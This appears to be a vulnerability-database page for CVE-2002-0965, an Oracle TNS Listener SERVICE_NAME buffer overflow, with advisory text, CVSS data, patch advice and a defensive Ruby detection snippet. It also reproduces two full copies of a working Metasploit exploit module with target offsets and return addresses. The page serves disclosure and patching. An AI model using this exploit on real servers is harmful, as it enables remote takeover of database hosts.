CVE-2002-0965
CVSS 7.5
Published: 2002-10-04 00:00:00
Revised: 2008-09-05 16:29:25

[Original] Buffer overflow in TNS Listener for Oracle 9i Database Server on Windows systems, and Oracle 8 on VM, allows local users to execute arbitrary code via a long SERVICE_NAME parameter, which is not properly handled when writing an error message to a log file.


[CNNVD] Oracle TNS Listener Remote Buffer Overflow Vulnerability (CNNVD-200210-206)

        
        TNS Listener is a component of the Oracle database, distributed and maintained by Oracle Corporation.
        Oracle TNS Listener contains a buffer overflow vulnerability that can allow a remote attacker to execute arbitrary instructions on the target system with the privileges of the TNS Listener process.
        The Listener listens on TCP port 1521 for connections from clients; once connected, a client sends a request similar to the following for the database server to handle:
        (DESCRIPTION=(ADDRESS=
        (PROTOCOL=TCP)(HOST=x.x.x.x)
        (PORT=1521))(CONNECT_DATA=
        (SERVICE_NAME=myorcl.ngssoftware.com)
        (CID=
        (PROGRAM=X:\\ORACLE\\iSuites\\BIN\\SQLPLUSW.EXE)
        (HOST=foo)(USER=bar))))
        By submitting an overly long SERVICE_NAME parameter, a buffer overflow is triggered when the program writes an error message to its log file, and a remote attacker may use this overflow to execute arbitrary instructions on the target system. On Windows these instructions run with SYSTEM privileges, so the attacker can obtain administrative control of the host.
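As an added example (not part of the CNNVD record or of the Metasploit module reproduced on this page), the following Ruby parses a TNS connect descriptor of the shape shown above and flags a SERVICE_NAME far longer than any genuine service name, the check a listener-side filter or log monitor would apply before the value is written anywhere; the 128-byte threshold and the two sample strings are assumptions.

```ruby
# Added example (not from the CNNVD record or the Metasploit module on this
# page): parse a TNS connect descriptor and flag an oversized SERVICE_NAME
# before it reaches a log line. Threshold is an assumption (real names are short).
MAX_SERVICE_NAME = 128

# Recursive-descent parser for "(KEY=VALUE)(KEY=(SUB=...))" descriptors.
# Returns [hash, next_position]; nested groups become nested hashes.
def parse_list(str, pos = 0)
  hash = {}
  while pos < str.length && str[pos] == '('
    pos += 1
    eq = str.index('=', pos)
    raise ArgumentError, "missing '=' near #{pos}" unless eq
    key = str[pos...eq].strip.upcase
    pos = eq + 1
    if str[pos] == '('
      value, pos = parse_list(str, pos)   # nested group
    else
      close = str.index(')', pos)
      raise ArgumentError, "missing ')' near #{pos}" unless close
      value = str[pos...close]            # scalar value
      pos = close
    end
    raise ArgumentError, "expected ')' near #{pos}" unless str[pos] == ')'
    pos += 1
    hash[key] = value
  end
  [hash, pos]
end

# Collect the length of every SERVICE_NAME anywhere in the parsed tree.
def service_name_lengths(node)
  node.flat_map do |k, v|
    next service_name_lengths(v) if v.is_a?(Hash)
    k == 'SERVICE_NAME' ? [v.length] : []
  end
end

# Verdict for one connect string; a descriptor that does not parse is suspicious.
def oversized_service_name?(connect_string)
  tree = parse_list(connect_string).first
  service_name_lengths(tree).any? { |n| n > MAX_SERVICE_NAME }
rescue ArgumentError
  true
end

# Constructed samples: the benign string quoted in the advisory, and one
# shaped like the exploit module's request (6396 bytes of filler, no payload).
BENIGN = '(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=x.x.x.x)(PORT=1521))' \
         '(CONNECT_DATA=(SERVICE_NAME=myorcl.ngssoftware.com)' \
         '(CID=(PROGRAM=X:\ORACLE\iSuites\BIN\SQLPLUSW.EXE)(HOST=foo)(USER=bar))))'
OVERSIZED = "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=#{'A' * 6396})(CID=(PROGRAM=MSF))))"
```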
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may be degraded or access to resources interrupted]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:oracle:oracle9i:9.0
cpe:/a:oracle:oracle9i:9.0.1
cpe:/a:oracle:oracle9i:9.0.2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0965
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0965
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-206
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/630091
(UNKNOWN)  CERT-VN  VU#630091
http://www.securityfocus.com/bid/4845
(VENDOR_ADVISORY)  BID  4845
http://otn.oracle.com/deploy/security/pdf/net9_dos_alert.pdf
(VENDOR_ADVISORY)  CONFIRM  http://otn.oracle.com/deploy/security/pdf/net9_dos_alert.pdf
http://www.iss.net/security_center/static/9288.php
(UNKNOWN)  XF  oracle-listener-servicename-bo(9288)
http://online.securityfocus.com/archive/1/276526
(UNKNOWN)  BUGTRAQ  20020612 Oracle TNS Listener Buffer Overflow (#NISR12062002A)
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0096.html
(UNKNOWN)  VULNWATCH  20020612 [VulnWatch] Oracle TNS Listener Buffer Overflow (#NISR12062002A)

- Vulnerability information

Oracle TNS Listener Remote Buffer Overflow Vulnerability
High  Unknown
2002-10-04 00:00:00 2005-05-02 00:00:00
Remote
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Run the TNS Listener under a low-privilege account, or use access controls to restrict which users can reach it.
        Vendor patch:
        Oracle
        ------
        The vendor has released a patch for this vulnerability; download it from the following site:
        Patch number: 2367681

        http://metalink.oracle.com

- Vulnerability information (16341)

Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow (EDBID:16341)
windows remote
2010-11-24 Verified
0 metasploit
N/A
##
# $Id: tns_service_name.rb 11128 2010-11-24 19:43:49Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::TNS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Oracle. When
				sending a specially crafted packet containing a long SERVICE_NAME
				to the TNS service, an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11128 $',
			'References'     =>
				[
					[ 'CVE', '2002-0965'],
					[ 'OSVDB', '5041'],
					[ 'BID', '4845'],
					[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml' ],
					[ 'URL', 'http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6396, 'Ret' => 0x60a1e154 } ],
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6392, 'Ret' => 0x60a1e154 }] ,
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'May 27 2002'))

		register_options([Opt::RPORT(1521)], self.class)
	end

	def check
		connect

		version = "(CONNECT_DATA=(COMMAND=VERSION))"
		pkt = tns_packet(version)
		sock.put(pkt)

		sock.get_once
		res = sock.get_once(-1, 1)

		disconnect

		if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
		buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
		buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400)

		sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))"

		pkt = tns_packet(sploit)

		print_status("Trying target #{target.name}...")
		sock.put(pkt)

		handler

		disconnect
	end

end
		

- Vulnerability information (F83091)

Oracle TNS Listener SERVICE_NAME Buffer Overflow. (PacketStormID:F83091)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary
CVE-2002-0965

This Metasploit module exploits a stack overflow in Oracle. When sending a specially crafted packet containing a long SERVICE_NAME to the TNS service, an attacker may be able to execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TNS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle TNS Listener SERVICE_NAME Buffer Overflow.',
			'Description'    => %q{
				This module exploits a stack overflow in Oracle. When
				sending a specially crafted packet containing a long SERVICE_NAME 
				to the TNS service, an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,			
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2002-0965'],
					[ 'OSVDB', '5041'],
					[ 'BID', '4845'],
					[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml' ],
					[ 'URL', 'http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6396, 'Ret' => 0x60a1e154 } ],
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6392, 'Ret' => 0x60a1e154 }] ,
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'May 27 2002'))

			register_options([Opt::RPORT(1521)], self.class)

	end

	def check
		connect

		version = "(CONNECT_DATA=(COMMAND=VERSION))"
	
		pkt = tns_packet(version)

		sock.put(pkt)
		
		sock.get_once

		res = sock.get_once(-1, 1)
		
		disconnect

			if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
				return Exploit::CheckCode::Vulnerable
			end
				return Exploit::CheckCode::Safe
	end

	def exploit
		connect

			buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
			buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
			buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400)

			sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))"
			
			pkt = tns_packet(sploit)

			print_status("Trying target #{target.name}...")
			sock.put(pkt)

			handler

		disconnect
	end

end
    

- Vulnerability information

5041
Oracle 9i TNS Listener SERVICE_NAME Parameter Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified, Vendor Verified, Coordinated Disclosure

- Vulnerability description

A buffer overflow exists in Oracle. The TNS Listener fails to validate SERVICE_NAME parameters resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2002-06-12 Unknown
Unknown 2002-06-12

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Oracle has released a patch to address this vulnerability.

- Related references

- Vulnerability author